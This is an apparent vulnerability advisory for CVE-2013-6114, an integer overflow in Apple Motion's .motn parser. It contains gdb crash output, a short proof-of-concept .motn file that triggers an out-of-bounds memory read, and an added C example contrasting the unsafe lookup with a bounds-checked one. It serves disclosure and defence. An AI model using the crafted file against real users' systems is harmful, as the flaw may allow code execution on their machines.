Apple Motion 'OZDocument::parseElement()' Function Integer Overflow Vulnerability


Release date: 2013-12-20
Last updated: 2013-12-23

Affected systems:
Apple Motion < 5.1
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 62874
CVE(CAN) ID: CVE-2013-6114

Motion is a motion-graphics tool from Apple used to create animated text and titles.

In versions of Apple Motion before 5.1, the 'OZDocument::parseElement()' function contains an integer overflow when processing MOTN files. Successful exploitation can cause an out-of-bounds memory access and allow arbitrary code execution.

<*Source: Jean Pascal Pereira
 
  Links: http://secunia.com/advisories/56196/
        http://www.exploit-db.com/exploits/28811/
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided only for security research and teaching. Users assume all risk!

Apple Motion Integer Overflow Vulnerability
===========================================

Vendor: Apple (http://www.apple.com)
Software: Motion 5.0.7
Testcase verified on: OS X 10.8

Credit: Jean Pascal Pereira <pereira@secbiz.de>

DESCRIPTION
===========

An integer overflow vulnerability has been identified in Apple Motion. The issue has been verified for Motion 5.0.7 (current release). Prior versions may also be affected.

An attacker has the possibility to provide a crafted .motn file containing a viewer element with a subview attribute. If the subview attribute is set to a very low or high integer value, the application crashes due to an access violation.

Debug message:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000002dd6e0990
0x0000000100858eb7 in OZDocument::parseElement ()

The crash is triggered in the function OZDocument::parseElement() at the following instruction:

(gdb) x/i 0x0000000100858eb7
0x100858eb7 <_ZN10OZDocument12parseElementER22PCSerializerReadStreamR15PCStreamElement+695>:  mov rsi, QWORD PTR [rbx+rax*8+0x98]

The value of rax is controlled by the attacker (in this case, the rax register contains the integer 989894991 which is provided in the PoC below).

(gdb) p $rax
$16 = 989894991

(gdb) p/x $rbx+($rax*8)+0x98
$1 = 0x2dd6e0990

PROOF OF CONCEPT
================

Create a .motn file with the following content:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ozxmlscene>
<ozml version="5.5">
<viewer subview="989894991">
</viewer>
</ozml>

DISCLOSURE TIMELINE
===================
2013/09/18: Vendor notified
2013/10/07: Public disclosure
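As an added example (not Apple's code and not part of the advisory above), the attribute-to-index lookup that the crashing instruction reflects, modelled in C beside a bounds-checked version that rejects the PoC's subview value; Document, Subview, sample_document and the other names are assumptions for illustration.

```c
#include <errno.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

typedef struct { int id; } Subview;
typedef struct {
    Subview *subviews[8];  /* pointer table: 8 bytes per slot, as in [rbx+rax*8+0x98] */
    size_t count;          /* slots actually populated */
} Document;

/* Constructed sample: the advisory's PoC .motn, inlined as one string. */
static const char SAMPLE_MOTN[] =
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE ozxmlscene>"
    "<ozml version=\"5.5\"><viewer subview=\"989894991\"></viewer></ozml>";

/* Constructed sample document with three populated subview slots. */
Document *sample_document(void) {
    static Subview s[3] = {{0}, {1}, {2}};
    static Document doc = {{&s[0], &s[1], &s[2]}, 3};
    return &doc;
}

/* Unsafe pattern: doc->subviews[strtol(attr)] with no range check; 989894991
 * reads ~7.9 GB past the table. Hardened: accept only a complete unsigned
 * decimal naming a populated slot; anything else (PoC value included) is NULL. */
Subview *lookup_checked(Document *doc, const char *attr) {
    char *end;
    if (*attr == '-' || *attr == '+') return NULL;  /* strtoull would accept a sign */
    errno = 0;
    unsigned long long v = strtoull(attr, &end, 10);
    if (errno == ERANGE || end == attr || *end != '\0') return NULL;
    if (v >= doc->count) return NULL;
    return doc->subviews[v];
}

/* Simplified extraction of subview="..." (strstr, not a real XML parser),
 * then the checked lookup; NULL when absent, malformed or out of range. */
Subview *subview_from_motn(Document *doc, const char *xml) {
    char buf[32];
    const char *p = strstr(xml, "subview=\"");
    if (p == NULL) return NULL;
    p += strlen("subview=\"");
    const char *q = strchr(p, '"');
    if (q == NULL || (size_t)(q - p) >= sizeof buf) return NULL;
    memcpy(buf, p, (size_t)(q - p));
    buf[q - p] = '\0';
    return lookup_checked(doc, buf);
}
```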

Recommendation:
--------------------------------------------------------------------------------
Vendor patches:

Apple
-----
The vendor has not yet released a patch or upgrade; we recommend that users of this software monitor the vendor's homepage for the latest version:

http://www.apple.com/support/downloads/
http://support.apple.com/kb/HT6041
http://archives.neohapsis.com/archives/bugtraq/2013-12/0119.html
